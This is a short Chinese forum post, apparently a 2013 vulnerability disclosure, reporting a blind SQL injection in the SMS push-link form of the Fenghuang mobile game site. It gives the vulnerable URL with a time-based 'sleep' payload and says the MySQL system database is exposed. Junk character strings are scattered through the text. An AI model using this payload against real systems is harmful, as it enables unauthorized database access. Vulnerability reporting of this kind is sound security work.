简要描述:5 q2 C( ^' V, L9 {: @$ r
凤凰手机游戏网,在填写手机号码发送push连接的地方存在sql盲注漏洞。
0 g3 d: G3 d- x6 i! B/ m- m- G; t
详细说明:) }1 Z! R9 Q1 E$ G
存在SQL盲注url:
5 \8 r+ _# a! u# @5 g# sfenghuang/game/game_send_sms.jsp?gameid=130221346000%27%20and%20sleep%282%29%3d%27&mo=1) M( J1 w7 ]' _
http://www.myhack58.com/Article/UploadPic/2013-4/2013411254849748.png* _' H1 {. d8 M5 `: ~9 m7 K4 g" d: o
http://www.myhack58.com/Article/UploadPic/2013-4/20134112545369314.png! ?! C1 U* b, r% x0 Q" t9 U
http://www.myhack58.com/Article/UploadPic/2013-4/20134112565766695.jpg$ {& |% |! q e2 O" m% R0 A- R5 L6 h
( b" m% O( {9 h% v t能看到mysql系统数据库,看来user权限应该很高的。。 | 
发表于 2013-4-4 17:34:29
收藏
支持
反对